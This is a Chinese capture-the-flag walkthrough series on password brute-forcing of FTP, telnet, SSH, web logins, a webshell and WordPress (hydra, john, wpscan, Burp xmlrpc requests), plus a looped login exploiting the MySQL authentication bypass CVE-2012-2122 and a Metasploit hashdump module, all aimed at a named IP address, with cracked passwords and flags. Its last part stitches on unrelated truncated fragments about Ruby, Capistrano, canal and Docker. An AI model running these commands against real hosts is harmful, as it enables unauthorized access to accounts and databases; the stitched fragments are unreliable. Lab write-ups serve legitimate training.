1、简介:MySQL是一个关系型数据库管理系统,关联数据库将数据保存在不同的表中,而不是将所有数据放在一个大仓库内,这样就增加了速度并提高了灵活性。
1、简介:后台,指网站后台,有时也称为网站管理后台,是指用于管理网站前台的一系列操作,如:产品、企业信息的增加、更新、删除等。
1、简介:一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用
1、简介:SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题
暴力破解即账号枚举,攻击者使用自己的用户名和密码字典,对目的服务器进行一个一个尝试登陆,主要字典足够强大,肯定就会猜解成功。尝试爆破成功后,为攻击者下一步渗透做准备。
hydra一些命令说明
通用:hydra <参数> <IP地址> <服务名>
Options(参数选项):
-R 继续从上一次进度接着破解。
-S 采用SSL链接。
-s PORT 可通过这个参数指定非默认端口。
-l LOGIN 指定破解的用户,对特定用户破解。
-L FILE 指定用户名字典。
-p PASS 小写,指定密码破解,少用,一般是采用密码字典。
-P FILE 大写,指定密码字典。
-e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
-C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
-M FILE 指定目标列表文件一行一条。
-o FILE 指定结果输出文件。
-f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
-t TASKS 同时运行的线程数,默认为16。
-w TIME 设置最大超时的时间,单位秒,默认是30s。
-v / -V 显示详细过程。
server 目标ip
service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
hydra -l admin -P /home/kali/top100pass.txt ftp://118.190.133.35

密码:zxcvbnm123
2、linux 登录 //还可以windows登录 软件登录 都可以...........
(1)ftp username:password@127.0.0.1:21 回车
(2)ftp username@127.0.0.1 回车 ##默认21端口 回车后输入密码
(3)ftp 127.0.0.1 回车 ##回车后 login 登录
(4)ftp 回车 --> open 127.0.0.1 --> login 登录
3、如果遇到中文乱码问题
set ftp:charset gbk(或者 gb2312 或 utf-8) ##设置ftp端的编码格式
set file:charset utf-8 (...同上) ##设置本地编码格式
4、使用ls命令 看到flag文件 然后下载

下载命令
lcd /home/kali ##存放目录 默认为 /home/kali
get 123.txt ##下载123.txt文件到 /home/kali

5、得到flag


2、kali打开hydra
hydra -l admin -P top100password.txt telnet://www.whalwl.fun -s 2323

3、登录
telnet www.whalwl.fun 2323

4、查找flag 并查看


flag{95f5353104092bc55ad0aad7defb9295}

2、利用漏洞-Mysql 身份认证绕过漏洞(CVE-2012-2122)
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。按照公告说法大约256次就能够蒙对一次。
for i in `seq 1 1000`; do mysql -uroot -paaaaa -h 118.190.133.35 -P3308 ; done
for : 利用linux的shell创造一个for循环
i : 循环的变量
seq 1 1000:表示循环是从1-1000
do:执行
mysql -uroot -paaaaa:mysql的登录命令,意思是用户名是root,密码是aaaaa
-h 118.190.133.35 -P3308:-h是IP ;-P是端口
done:表示循环结束
3、验证并登录
for ((i=1;i<1000;i++));do mysql -h 118.190.133.35 -uroot -proot -P 3308;echo $i;done

4、接下来看一下表 查看
show databases;
use whalwl;
show tables;

5、查看flag信息
select * from flag;

得到flag{d03d4082619be132cf07aa6e2724f854}
6、打开kali采用msfconsole中的模块进行漏洞验证,然后解hash就可以看到密码,得到密码后,可以利用数据库连接工具进行连接(这里我不做演示)
使用命令:
msfcnsole #进入msf模块
use mysql_authbypass_hashdump #使用漏洞工具模块
show options #查看选项
set RHOSTS 118.190.133.35 #设置目标ip
set RPORT 3308 #设置目标端口
run #执行

1、先随便填写一个账号登录,发现弹窗显示用户不存在,

2、再使用admin账号,密码随便填写,发现弹窗显示账号或密码错误,所以我们可先进行用户名枚举,再根据用户名来爆破密码

3、使用burp suite抓包,指定爆破字典,即可先后爆破出用户名 和密码

4、admin账户 没爆出来

5、使用另外一个用户名 zachariah

6、同时进行爆破



7、得到密码system2021 进行登录

flag{7af9abf30e4cf730e76925bffd4340fc}
这里一句话破解是破解网站shell密码,所以得到网址后,我们扫描一下目录,发现存在robots.txt文件,我们打开看一下,发现存在许多文件,我发现/.webconsole.php文件最可疑,我们就从这个开始破解shell密码。这里使用到的工具是K8_FuckOneShell(扫描shell密码) 然后我们下载靶场提供的字典,把字典粘贴到K8_FuckOneShell同文件目录下。下载地址GitHub - fan-ch/K8tools at 78dd750a11258b803c2a0f1a2dcdcbffc1834148
里面找一下 或者全部下载 反正以后也要用
2、扫描目录 7kbscan

2.1dirsearch目录扫描 //kali自带
dirsearch -u ip地址

也能看到有这个文件
3、 得到wenshell地址
http://118.190.133.35:8089/robots.txt

4、K8_FuckOneShell

vvvvvvvangel
5、菜刀连接-查找flag

flag{dc6a19854e5a82ea97d486ccd98e39d0}
2、下载题目的字典文件john.zip发现有两个文件 shadow和john_dict.txt使用kali自带的john爆破工具进行撞库
2、工具介绍:john(线密码破解者)
常用命令:john --wordlist=./dict.txt ./shadow -->指定字典dict.txt爆破shadow文件。
john ./shadow -->不指定字典,直接拿john提供的字典来爆破shadow文件。
john --show ./shadow -->查上次爆破结果,在shadow文件中。
3、john离线爆破,或hydra在线爆破(hydra -l test -P ./pass.txt ssh://118.190.133.35:22000),成功获取密码:zmmydfz@10086
4、使用 FinalShell 或 XShell 连接SSH,认证方式选择Keyboard Interactive。
5、命令行窗口执行①cd ../../②ls③cat this_is_flag得到flag信息:flag{1f73c112d66b314697d68115e06c409b}23888028fc0a:/$。
6、注(21/11/04):Linux中直接使用ssh username@ip或ssh IP也可连接,如ssh root@127.0.0.1

zmmydfz@10086
3、ssh连接

4、得到flag

flag{1f73c112d66b314697d68115e06c409b}
常用命令:
wpscan --update #更新到最新版本
wpscan --url http://xxxx.com #扫描网站
wpscan --url http://xxxx.com --enumerate -u #枚举wordpress用户名
#--enumerate | -e [option(s)] 枚举
u 枚举用户名,默认从1-10
u[10-20] 枚举用户名,配置从10-20
p 枚举插件
vp 只枚举有漏洞的插件
ap 枚举所有插件,时间较长
tt 列举缩略图相关的文件
t 枚举主题信息
vt 只枚举存在漏洞的主题
2、对网站用户进行枚举爆破
wpscan --url http://118.190.133.35:8090/ --enumerate u
使用此命令,会枚举出网站已经注册的用户名,枚举出用户名之后,就可以通过xmlrpc.php或者后台登录页面进行爆破,对应的防御手段就是禁用掉xmlrpc.php并对后台进行隐藏
命令:wpscan –url (网站链接) –wordlist 密码文件 –username 用户名
wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt
wpscan --url http://xxxx.com --username '用户名' -P 字典.txt #已知用户名使用字典爆破密码
wpscan --url http://xxxx.com -P password.txt -U username.txt #同时爆破用户名及密码wpscan --url http://118.190.133.35:8090 / -e u -P /home/kali/Desktop/dict.txt //程序会自动识别出用户名,并爆破密码
3、burp抓包 wpscan先枚举用户名 然后去登录 抓包进行密码破解就行了 都差不多
POST /xmlrpc.php HTTP/1.1
Host: 118.190.133.35:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
Connection: close
Upgrade-Insecure-Requests: 1
<methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value><string></string></value></param><param><value><string>whalwlweb</string></value></param><param><value><string>§123456§</string></value></param></params></methodCall>
是的,我知道最好使用webmock,但我想知道如何在RSpec中模拟此方法:defmethod_to_testurl=URI.parseurireq=Net::HTTP::Post.newurl.pathres=Net::HTTP.start(url.host,url.port)do|http|http.requestreq,foo:1endresend这是RSpec:let(:uri){'http://example.com'}specify'HTTPcall'dohttp=mock:httpNet::HTTP.stub!(:start).and_yieldhttphttp.shou
我尝试使用不同的ssh_options在同一阶段运行capistranov.3任务。我的production.rb说:set:stage,:productionset:user,'deploy'set:ssh_options,{user:'deploy'}通过此配置,capistrano与用户deploy连接,这对于其余的任务是正确的。但是我需要将它连接到服务器中配置良好的an_other_user以完成一项特定任务。然后我的食谱说:...taskswithoriginaluser...task:my_task_with_an_other_userdoset:user,'an_othe
我目前正在使用以下方法获取页面的源代码:Net::HTTP.get(URI.parse(page.url))我还想获取HTTP状态,而无需发出第二个请求。有没有办法用另一种方法做到这一点?我一直在查看文档,但似乎找不到我要找的东西。 最佳答案 在我看来,除非您需要一些真正的低级访问或控制,否则最好使用Ruby的内置Open::URI模块:require'open-uri'io=open('http://www.example.org/')#=>#body=io.read[0,50]#=>"["200","OK"]io.base_ur
文章目录一、概述简介原理模块二、配置Mysql使用版本环境要求1.操作系统2.mysql要求三、配置canal-server离线下载在线下载上传解压修改配置单机配置集群配置分库分表配置1.修改全局配置2.实例配置垂直分库水平分库3.修改group-instance.xml4.启动监听四、配置canal-adapter1修改启动配置2配置映射文件3启动ES数据同步查询所有订阅同步数据同步开关启动4.验证五、配置canal-admin一、概述简介canal是Alibaba旗下的一款开源项目,Java开发。基于数据库增量日志解析,提供增量数据订阅&消费。Git地址:https://github.co
1.错误信息:Errorresponsefromdaemon:Gethttps://registry-1.docker.io/v2/:net/http:requestcanceledwhilewaitingforconnection(Client.Timeoutexceededwhileawaitingheaders)或者:Errorresponsefromdaemon:Gethttps://registry-1.docker.io/v2/:net/http:TLShandshaketimeout2.报错原因:docker使用的镜像网址默认为国外,下载容易超时,需要修改成国内镜像地址(首先阿里
Rails中有没有一种方法可以提取与路由关联的HTTP动词?例如,给定这样的路线:将“users”匹配到:“users#show”,通过:[:get,:post]我能实现这样的目标吗?users_path.respond_to?(:get)(显然#respond_to不是正确的方法)我最接近的是通过执行以下操作,但它似乎并不令人满意。Rails.application.routes.routes.named_routes["users"].constraints[:request_method]#=>/^GET$/对于上下文,我有一个设置cookie然后执行redirect_to:ba
我正在使用Heroku(heroku.com)来部署我的Rails应用程序,并且正在构建一个iPhone客户端来与之交互。我的目的是将手机的唯一设备标识符作为HTTPheader传递给应用程序以进行身份验证。当我在本地测试时,我的header通过得很好,但在Heroku上它似乎去掉了我的自定义header。我用ruby脚本验证:url=URI.parse('http://#{myapp}.heroku.com/')#url=URI.parse('http://localhost:3000/')req=Net::HTTP::Post.new(url.path)#boguspara
我试图在我的网站上实现使用Facebook登录功能,但在尝试从Facebook取回访问token时遇到障碍。这是我的代码:ifparams[:error_reason]=="user_denied"thenflash[:error]="TologinwithFacebook,youmustclick'Allow'toletthesiteaccessyourinformation"redirect_to:loginelsifparams[:code]thentoken_uri=URI.parse("https://graph.facebook.com/oauth/access_token
我是Ruby的新手。我试过查看在线文档,但没有找到任何有效的方法。我想在以下HTTP请求botget_response()和get()中包含一个用户代理。有人可以指出我正确的方向吗?#PreliminarycheckthatProggitisupcheck=Net::HTTP.get_response(URI.parse(proggit_url))ifcheck.code!="200"puts"ErrorcontactingProggit"returnend#Attempttogetthejsonresponse=Net::HTTP.get(URI.parse(proggit_url)
我看到其他人也遇到过类似的问题,但没有一个解决方案对我有用。0.3.14gem与其他gem文件一起存在。我已经完全按照此处指示完成了所有操作:https://github.com/brianmario/mysql2.我仍然得到以下信息。我不知道为什么安装程序指示它找不到include目录,因为我已经检查过它存在。thread.h文件存在,但不在ruby目录中。相反,它在这里:C:\RailsInstaller\DevKit\lib\perl5\5.8\msys\CORE\我正在运行Windows7并尝试在Aptana3中构建我的Rails项目。我的Ruby是1.9.3。$gemin